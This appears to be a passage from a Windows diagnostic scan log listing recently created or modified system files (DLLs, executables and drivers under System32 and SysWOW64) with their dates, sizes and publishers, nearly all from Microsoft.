2016-08-18 23:18 - 2016-08-03 00:25 - 00712192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2016-08-18 23:18 - 2016-08-03 00:21 - 00854016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2016-08-18 23:18 - 2016-06-25 01:38 - 01119744 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2016-08-18 23:18 - 2016-06-23 23:55 - 01012736 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll
2016-08-18 23:18 - 2016-06-23 23:44 - 00181760 _____ (Microsoft Corporation) C:\Windows\system32\shutdownux.dll
2016-08-18 23:18 - 2016-05-28 00:21 - 00545400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontdrvhost.exe
2016-08-18 23:18 - 2016-05-28 00:21 - 00316256 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-08-18 23:18 - 2016-05-28 00:09 - 00914944 _____ (Microsoft Corporation) C:\Windows\system32\SharedStartModel.dll
2016-08-18 23:18 - 2016-05-27 23:54 - 00856064 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
2016-08-18 23:18 - 2016-05-27 23:25 - 00295936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieproxy.dll
2016-08-18 23:18 - 2016-04-15 02:05 - 00104448 _____ (Microsoft Corporation) C:\Windows\system32\CloudDomainJoinDataModelServer.dll
2016-08-18 23:18 - 2016-04-09 03:06 - 00827392 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-08-18 23:18 - 2016-03-16 00:56 - 00861512 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2016-08-18 23:18 - 2016-03-15 23:44 - 01016832 _____ (Microsoft Corporation) C:\Windows\system32\RDXService.dll
2016-08-18 23:18 - 2016-03-15 23:43 - 00573952 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Cortana.Desktop.dll
2016-08-18 23:18 - 2016-03-15 23:42 - 01290240 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Shell.dll
2016-08-18 23:18 - 2016-03-15 23:40 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Scanners.dll
2016-08-18 23:18 - 2016-03-15 23:36 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\wpninprc.dll
2016-08-18 23:18 - 2016-03-15 23:35 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\AppxApplicabilityEngine.dll
2016-08-18 23:18 - 2016-02-23 10:41 - 01150816 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-08-18 23:18 - 2016-02-23 09:25 - 01085632 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-08-18 23:18 - 2016-02-23 08:15 - 00033280 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2016-08-18 23:18 - 2016-02-23 07:03 - 00450560 _____ (Microsoft Corporation) C:\Windows\system32\werui.dll
2016-08-18 23:18 - 2016-02-23 06:51 - 00915456 _____ (Microsoft Corporation) C:\Windows\system32\configurationclient.dll
2016-08-18 23:18 - 2016-02-23 06:51 - 00678912 _____ (Microsoft Corporation) C:\Windows\system32\scapi.dll
2016-08-18 23:18 - 2016-02-23 06:17 - 00393728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\werui.dll
2016-08-18 23:18 - 2016-01-31 01:33 - 00057856 _____ (Microsoft Corporation) C:\Windows\system32\IoTAssignedAccessLockFramework.dll
2016-08-18 23:18 - 2016-01-31 01:24 - 00784384 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2016-08-18 23:18 - 2016-01-31 01:22 - 00680448 _____ (Microsoft Corporation) C:\Windows\system32\rasmans.dll
2016-08-18 23:18 - 2016-01-31 01:11 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2016-08-18 23:18 - 2016-01-04 23:04 - 00772448 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-08-18 23:18 - 2016-01-04 23:04 - 00751992 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2016-08-18 23:18 - 2016-01-04 23:04 - 00667856 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-08-18 23:18 - 2016-01-04 22:30 - 01106872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetsrc.dll
2016-08-18 23:18 - 2016-01-04 22:28 - 00714808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetcore.dll
2016-08-18 23:18 - 2016-01-04 22:28 - 00696192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2016-08-18 23:18 - 2016-01-04 22:28 - 00497896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-08-18 23:18 - 2016-01-04 22:28 - 00116728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-08-18 23:18 - 2016-01-04 22:15 - 00931328 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL
2016-08-18 23:18 - 2016-01-04 22:09 - 00205312 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-08-18 23:18 - 2016-01-04 21:51 - 01255936 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2016-08-18 23:18 - 2016-01-04 21:51 - 01009664 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2016-08-18 23:18 - 2016-01-04 21:51 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL
2016-08-18 23:18 - 2016-01-04 21:42 - 00871936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL
2016-08-18 23:18 - 2016-01-04 21:20 - 00890880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL
2016-08-18 23:18 - 2016-01-04 21:19 - 01070080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2016-08-18 23:18 - 2016-01-04 21:19 - 00404992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL
2016-08-18 23:18 - 2015-11-25 01:27 - 01366680 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2016-08-18 23:18 - 2015-11-25 01:09 - 01310880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2016-08-18 23:18 - 2015-11-25 00:37 - 02350592 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-08-18 23:18 - 2015-11-25 00:35 - 00929792 _____ (Microsoft Corporation) C:\Windows\system32\SRH.dll
2016-08-18 23:18 - 2015-11-25 00:35 - 00845824 _____ (Microsoft Corporation) C:\Windows\system32\Magnify.exe
2016-08-18 23:18 - 2015-11-25 00:29 - 00355328 _____ (Microsoft Corporation) C:\Windows\system32\ninput.dll
2016-08-18 23:18 - 2015-11-25 00:26 - 00849408 _____ (Microsoft Corporation) C:\Windows\system32\comdlg32.dll
2016-08-18 23:18 - 2015-11-25 00:23 - 00587776 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-08-18 23:18 - 2015-11-25 00:22 - 00603648 _____ (Microsoft Corporation) C:\Windows\system32\duser.dll
2016-08-18 23:18 - 2015-11-25 00:17 - 00774656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SRH.dll
2016-08-18 23:18 - 2015-11-25 00:16 - 00786432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Magnify.exe
2016-08-18 23:18 - 2015-11-25 00:13 - 02153984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-08-18 23:18 - 2015-11-25 00:08 - 00749568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comdlg32.dll
2016-08-18 23:18 - 2015-11-05 01:13 - 00577888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2016-08-18 23:18 - 2015-11-05 00:06 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Usb.dll
2016-08-18 23:18 - 2015-11-04 23:59 - 02675200 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepository.dll
2016-08-18 23:18 - 2015-11-04 23:27 - 02049536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepository.dll
2016-08-18 23:18 - 2015-09-17 02:48 - 00505696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2016-08-18 23:18 - 2015-09-17 02:48 - 00395088 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2016-08-18 23:18 - 2015-09-17 02:37 - 01295712 _____ (Microsoft Corporation) C:\Windows\system32\wpx.dll
2016-08-18 23:18 - 2015-09-17 02:08 - 00494592 _____ (Microsoft Corporation) C:\Windows\system32\StoreAgent.dll
2016-08-18 23:18 - 2015-09-17 01:48 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\ncryptprov.dll
2016-08-18 23:18 - 2015-09-17 01:46 - 00118272 _____ (Microsoft Corporation) C:\Windows\system32\KnobsCsp.dll
2016-08-18 23:18 - 2015-09-17 01:45 - 01331200 _____ (Microsoft Corporation) C:\Windows\system32\UIAutomationCore.dll
2016-08-18 23:18 - 2015-09-17 01:32 - 00313856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LockAppBroker.dll
2016-08-18 23:18 - 2015-09-17 01:31 - 00268800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptprov.dll
2016-08-18 23:18 - 2015-09-17 01:29 - 01104384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAutomationCore.dll
2016-08-18 23:18 - 2015-08-27 01:42 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.PicturePassword.dll
2016-08-18 23:18 - 2015-08-20 02:06 - 00609592 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2016-08-18 23:18 - 2015-08-20 01:26 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\InstallAgent.exe
2016-08-18 23:18 - 2015-08-18 02:59 - 01294336 _____ (Microsoft Corporation) C:\Windows\system32\wcnwiz.dll
2016-08-18 23:18 - 2015-08-18 02:58 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\WcnNetsh.dll
2016-08-18 23:18 - 2015-08-18 02:36 - 01226752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wcnwiz.dll
2016-08-18 23:18 - 2015-08-18 02:35 - 00100352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WcnApi.dll
2016-08-18 23:18 - 2015-08-18 02:35 - 00095744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdWCN.dll
2016-08-18 23:18 - 2015-08-11 06:02 - 00080720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\stornvme.sys
2016-08-18 23:18 - 2015-08-11 05:52 - 00993104 _____ (Microsoft Corporation) C:\Windows\system32\ReAgent.dll
2016-08-18 23:18 - 2015-08-11 05:26 - 00845664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ReAgent.dll
2016-08-18 23:18 - 2015-08-11 05:05 - 00078848 _____ (Microsoft Corporation) C:\Windows\system32\LocationFrameworkInternalPS.dll
2016-08-18 23:18 - 2015-08-02 21:30 - 00253952 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_UserAccount.dll
2016-08-18 23:18 - 2015-08-02 21:23 - 00122880 _____ (Microsoft Corporation) C:\Windows\system32\VEDataLayerHelpers.dll
2016-08-18 23:18 - 2015-08-02 21:15 - 00171520 _____ (Microsoft Corporation) C:\Windows\system32\WinBioDataModel.dll
2016-08-18 23:18 - 2015-07-30 02:21 - 00816576 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll
2016-08-18 23:18 - 2015-07-30 02:17 - 01025840 _____ (Microsoft Corporation) C:\Windows\system32\mfsrcsnk.dll
2016-08-18 23:18 - 2015-07-30 02:15 - 00632168 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2016-08-18 23:18 - 2015-07-30 02:06 - 01043872 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2016-08-18 23:18 - 2015-07-30 00:26 - 00877016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2016-08-18 23:18 - 2015-07-30 00:25 - 00713312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll
2016-08-18 23:18 - 2015-07-30 00:22 - 00896144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsrcsnk.dll
2016-08-18 23:18 - 2015-07-30 00:22 - 00507696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxgi.dll
2016-08-18 23:18 - 2015-07-29 23:52 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\ACPBackgroundManagerPolicy.dll
2016-08-18 23:18 - 2015-07-29 23:46 - 00487424 _____ (Microsoft Corporation) C:\Windows\system32\mfmkvsrcsnk.dll
2016-08-18 23:18 - 2015-07-29 23:41 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\NotificationControllerPS.dll
2016-08-18 23:18 - 2015-07-29 23:06 - 00373248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmkvsrcsnk.dll
2016-08-18 23:18 - 2015-07-25 23:49 - 00872448 _____ (Microsoft Corporation) C:\Windows\system32\ntshrui.dll
2016-08-18 23:18 - 2015-07-25 23:34 - 00798208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntshrui.dll
2016-08-18 23:18 - 2015-07-23 23:17 - 00695136 _____ (Microsoft Corporation) C:\Windows\system32\wimgapi.dll
2016-08-18 23:18 - 2015-07-23 23:17 - 00521568 _____ (Microsoft Corporation) C:\Windows\system32\wimserv.exe
2016-08-18 23:18 - 2015-07-18 04:47 - 00082616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcd.dll
2016-08-18 23:18 - 2015-07-18 03:37 - 01043968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Editing.dll
2016-08-18 23:18 - 2015-07-18 03:26 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spbcd.dll
2016-08-18 23:18 - 2015-07-17 23:59 - 01411072 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Editing.dll
2016-08-18 23:18 - 2015-07-17 23:59 - 00232960 _____ (Microsoft Corporation) C:\Windows\system32\DevicesFlowBroker.dll
2016-08-18 23:18 - 2015-07-16 22:33 - 00053248 _____ (Microsoft Corporation) C:\Windows\system32\omadmprc.exe
2016-08-18 23:18 - 2015-07-16 00:03 - 00060928 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Cortana.OneCore.dll
2016-08-18 23:18 - 2015-07-15 23:41 - 00271872 _____ (Microsoft Corporation) C:\Windows\system32\ConsoleLogon.dll
2016-08-18 23:18 - 2015-07-14 22:22 - 02112512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll
2016-08-18 23:18 - 2015-07-14 21:47 - 04611584 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2016-08-18 23:18 - 2015-07-14 21:37 - 00068096 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Cortana.ProxyStub.dll
2016-08-18 23:18 - 2015-07-10 11:51 - 00823336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MrmCoreR.dll
2016-08-18 23:18 - 2015-07-10 11:00 - 01101792 _____ (Microsoft Corporation) C:\Windows\system32\MrmCoreR.dll
2016-08-18 23:18 - 2015-07-10 06:59 - 00179712 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_SignInOptions.dll
2016-08-18 23:18 - 2015-07-10 06:05 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MCRecvSrc.dll
2016-08-18 23:17 - 2016-08-03 01:46 - 00632680 _____ (Microsoft Corporation) C:\Windows\system32\sppwinob.dll
2016-08-18 23:17 - 2016-08-03 00:55 - 00290304 _____ (Microsoft Corporation) C:\Windows\system32\oemlicense.dll
2016-08-18 23:17 - 2016-08-03 00:47 - 00209920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oemlicense.dll
2016-08-18 23:17 - 2016-08-03 00:47 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\WSClient.dll
2016-08-18 23:17 - 2016-08-03 00:46 - 00183808 _____ (Microsoft Corporation) C:\Windows\system32\WSSync.dll
2016-08-18 23:17 - 2016-08-03 00:44 - 00345088 _____ (Microsoft Corporation) C:\Windows\system32\eappcfg.dll
2016-08-18 23:17 - 2016-08-03 00:43 - 00326656 _____ (Microsoft Corporation) C:\Windows\system32\eapp3hst.dll
2016-08-18 23:17 - 2016-08-03 00:43 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\eapphost.dll
2016-08-18 23:17 - 2016-08-03 00:42 - 00065024 _____ (Microsoft Corporation) C:\Windows\system32\eappprxy.dll
2016-08-18 23:17 - 2016-08-03 00:40 - 00771072 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2016-08-18 23:17 - 2016-08-03 00:39 - 00153088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSSync.dll
2016-08-18 23:17 - 2016-08-03 00:39 - 00151552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSClient.dll
2016-08-18 23:17 - 2016-08-03 00:38 - 00249344 _____ (Microsoft Corporation) C:\Windows\system32\apprepapi.dll
2016-08-18 23:17 - 2016-08-03 00:38 - 00239104 _____ (Microsoft Corporation) C:\Windows\system32\apprepsync.dll
2016-08-18 23:17 - 2016-08-03 00:36 - 00279552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eappcfg.dll
2016-08-18 23:17 - 2016-08-03 00:36 - 00215040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eapphost.dll
2016-08-18 23:17 - 2016-08-03 00:35 - 00243712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eapp3hst.dll
2016-08-18 23:17 - 2016-08-03 00:35 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eappprxy.dll
2016-08-18 23:17 - 2016-08-03 00:32 - 00574464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakradiag.dll
2016-08-18 23:17 - 2016-08-03 00:31 - 00575488 _____ (Microsoft Corporation) C:\Windows\system32\DbgModel.dll
2016-08-18 23:17 - 2016-08-03 00:31 - 00402432 _____ (Microsoft Corporation) C:\Windows\system32\FWPUCLNT.DLL
2016-08-18 23:17 - 2016-08-03 00:30 - 00185856 _____ (Microsoft Corporation) C:\Windows\system32\WUDFPlatform.dll
2016-08-18 23:17 - 2016-08-03 00:29 - 00158720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apprepsync.dll
2016-08-18 23:17 - 2016-08-03 00:21 - 00268800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FWPUCLNT.DLL
2016-08-18 23:17 - 2016-06-23 23:42 - 00348160 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.dll
2016-08-18 23:17 - 2016-06-23 23:22 - 00309248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.dll
2016-08-18 23:17 - 2016-05-28 01:02 - 00421536 _____ (Microsoft Corporation) C:\Windows\system32\ws2_32.dll
2016-08-18 23:17 - 2016-05-28 01:00 - 00203496 _____ (Microsoft Corporation) C:\Windows\system32\rsaenh.dll
2016-08-18 23:17 - 2016-05-28 00:59 - 00363872 _____ (Microsoft Corporation) C:\Windows\system32\mswsock.dll
2016-08-18 23:17 - 2016-05-28 00:47 - 00613120 _____ (Microsoft Corporation) C:\Windows\system32\fontdrvhost.exe
2016-08-18 23:17 - 2016-05-28 00:47 - 00379232 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-08-18 23:17 - 2016-05-28 00:38 - 00372368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ws2_32.dll
2016-08-18 23:17 - 2016-05-28 00:38 - 00306528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswsock.dll
2016-08-18 23:17 - 2016-05-28 00:35 - 00183904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rsaenh.dll
2016-08-18 23:17 - 2016-03-16 00:41 - 00208736 _____ (Microsoft Corporation) C:\Windows\system32\AppxAllUserStore.dll
2016-08-18 23:17 - 2016-03-16 00:06 - 00181088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxAllUserStore.dll
2016-08-18 23:17 - 2016-03-15 23:56 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\PhoneCallHistoryApis.dll
2016-08-18 23:17 - 2016-03-15 23:55 - 00257024 _____ (Microsoft Corporation) C:\Windows\system32\UserDataAccountApis.dll
2016-08-18 23:17 - 2016-03-15 23:55 - 00023552 _____ (Microsoft Corporation) C:\Windows\system32\ExtrasXmlParser.dll
2016-08-18 23:17 - 2016-03-15 23:40 - 00931840 _____ (Microsoft Corporation) C:\Windows\system32\AppxPackaging.dll
2016-08-18 23:17 - 2016-03-15 23:40 - 00158208 _____ (Microsoft Corporation) C:\Windows\system32\AppxSip.dll
2016-08-18 23:17 - 2016-03-15 23:37 - 00856576 _____ (Microsoft Corporation) C:\Windows\system32\ContactApis.dll
2016-08-18 23:17 - 2016-03-15 23:37 - 00752640 _____ (Microsoft Corporation) C:\Windows\system32\ChatApis.dll
2016-08-18 23:17 - 2016-03-15 23:36 - 00720896 _____ (Microsoft Corporation) C:\Windows\system32\EmailApis.dll
2016-08-18 23:17 - 2016-03-15 23:36 - 00195072 _____ (Microsoft Corporation) C:\Windows\system32\VCardParser.dll
2016-08-18 23:17 - 2016-03-15 23:31 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataAccountApis.dll
2016-08-18 23:17 - 2016-03-15 23:31 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhoneCallHistoryApis.dll
2016-08-18 23:17 - 2016-03-15 23:17 - 00842240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxPackaging.dll
2016-08-18 23:17 - 2016-03-15 23:17 - 00133120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxSip.dll
2016-08-18 23:17 - 2016-03-15 23:14 - 00625152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ContactApis.dll
2016-08-18 23:17 - 2016-03-15 23:14 - 00579584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppointmentApis.dll
2016-08-18 23:17 - 2016-03-15 23:14 - 00557568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ChatApis.dll
2016-08-18 23:17 - 2016-03-15 23:13 - 00525312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EmailApis.dll
2016-08-18 23:17 - 2016-03-15 23:13 - 00150528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VCardParser.dll
2016-08-18 23:17 - 2016-03-15 23:13 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataLanguageUtil.dll
2016-08-18 23:17 - 2016-02-23 10:38 - 00272752 _____ (Microsoft Corporation) C:\Windows\system32\sqmapi.dll
2016-08-18 23:17 - 2016-02-23 09:09 - 00229352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sqmapi.dll
2016-08-18 23:17 - 2016-01-31 01:29 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\rasman.dll
2016-08-18 23:17 - 2016-01-31 01:13 - 00123392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rasman.dll
2016-08-18 23:17 - 2016-01-04 23:04 - 00250520 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL
2016-08-18 23:17 - 2016-01-04 22:52 - 00441696 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-08-18 23:17 - 2016-01-04 22:50 - 00251544 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL
2016-08-18 23:17 - 2016-01-04 22:28 - 00277400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL
2016-08-18 23:17 - 2016-01-04 22:10 - 00539136 _____ (Microsoft Corporation) C:\Windows\system32\mfh264enc.dll
2016-08-18 23:17 - 2016-01-04 22:10 - 00278424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL
2016-08-18 23:17 - 2016-01-04 21:38 - 00556032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfh264enc.dll
2016-08-18 23:17 - 2015-11-25 00:11 - 00296960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ninput.dll
2016-08-18 23:17 - 2015-11-25 00:04 - 00480768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\duser.dll
2016-08-18 23:17 - 2015-11-25 00:04 - 00474624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-08-18 23:17 - 2015-11-24 22:52 - 00775312 _____ C:\Windows\SysWOW64\locale.nls
2016-08-18 23:17 - 2015-11-24 22:52 - 00775312 _____ C:\Windows\system32\locale.nls
2016-08-18 23:17 - 2015-11-04 23:54 - 00502272 _____ (Microsoft Corporation) C:\Windows\system32\dlnashext.dll
2016-08-18 23:17 - 2015-11-04 23:23 - 00441344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dlnashext.dll
2016-08-18 23:17 - 2015-09-17 02:48 - 00537080 _____ (Microsoft Corporation) C:\Windows\system32\WWanAPI.dll
2016-08-18 23:17 - 2015-09-17 02:48 - 00406864 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2016-08-18 23:17 - 2015-09-17 02:48 - 00278352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2016-08-18 23:17 - 2015-09-17 02:28 - 00407608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2016-08-18 23:17 - 2015-09-17 02:26 - 00428128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WWanAPI.dll
2016-08-18 23:17 - 2015-09-17 02:09 - 00269312 _____ (Microsoft Corporation) C:\Windows\system32\provengine.dll
2016-08-18 23:17 - 2015-09-17 02:03 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\provisioningcsp.dll
2016-08-18 23:17 - 2015-09-17 02:03 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\DeviceEnroller.exe
2016-08-18 23:17 - 2015-09-17 01:57 - 00403456 _____ (Microsoft Corporation) C:\Windows\system32\dmenrollengine.dll
2016-08-18 23:17 - 2015-09-17 01:55 - 00346112 _____ (Microsoft Corporation) C:\Windows\system32\ngccredprov.dll
2016-08-18 23:17 - 2015-09-17 01:55 - 00073728 _____ (Microsoft Corporation) C:\Windows\system32\wwancfg.dll
2016-08-18 23:17 - 2015-09-17 01:52 - 06572032 _____ (Microsoft Corporation) C:\Windows\system32\wwanmm.dll
2016-08-18 23:17 - 2015-09-17 01:52 - 00570880 _____ (Microsoft Corporation) C:\Windows\system32\MbaeApi.dll
2016-08-18 23:17 - 2015-09-17 01:51 - 01812480 _____ (Microsoft Corporation) C:\Windows\system32\pnidui.dll
2016-08-18 23:17 - 2015-09-17 01:44 - 00599552 _____ (Microsoft Corporation) C:\Windows\system32\wpnapps.dll
2016-08-18 23:17 - 2015-09-17 01:37 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MbaeApi.dll
2016-08-18 23:17 - 2015-09-17 01:28 - 00473088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpnapps.dll
2016-08-18 23:17 - 2015-08-18 02:54 - 00247296 _____ C:\Windows\system32\facecredentialprovider.dll
2016-08-18 23:17 - 2015-08-11 05:13 - 00413184 _____ C:\Windows\system32\diagtrack_win.dll
2016-08-18 23:17 - 2015-08-11 04:59 - 00042496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tetheringclient.dll
2016-08-18 23:17 - 2015-08-11 04:38 - 00162304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ReInfo.dll
2016-08-18 23:17 - 2015-08-05 00:00 - 00310784 _____ (Microsoft Corporation) C:\Windows\system32\ActionCenter.dll
2016-08-18 23:17 - 2015-08-04 23:39 - 00261632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ActionCenter.dll
2016-08-18 23:17 - 2015-08-02 22:32 - 00306688 _____ (Microsoft Corporation) C:\Windows\system32\NotificationObjFactory.dll
2016-08-18 23:17 - 2015-08-02 22:28 - 00268800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NotificationObjFactory.dll
2016-08-18 23:17 - 2015-08-02 21:19 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\notepad.exe
2016-08-18 23:17 - 2015-08-02 21:19 - 00215040 _____ (Microsoft Corporation) C:\Windows\notepad.exe
2016-08-18 23:17 - 2015-08-02 21:11 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\msctfuimanager.dll
2016-08-18 23:17 - 2015-08-02 21:06 - 00207872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
2016-08-18 23:17 - 2015-08-02 20:59 - 00752640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctfuimanager.dll
2016-08-18 23:17 - 2015-07-30 02:23 - 00527952 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2016-08-18 23:17 - 2015-07-29 23:06 - 00034816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VoiceActivationManager.dll
2016-08-18 23:17 - 2015-07-25 23:47 - 00356352 _____ (Microsoft Corporation) C:\Windows\system32\stobject.dll
2016-08-18 23:17 - 2015-07-25 23:35 - 00322048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\stobject.dll
2016-08-18 23:17 - 2015-07-23 23:12 - 00584544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wimgapi.dll
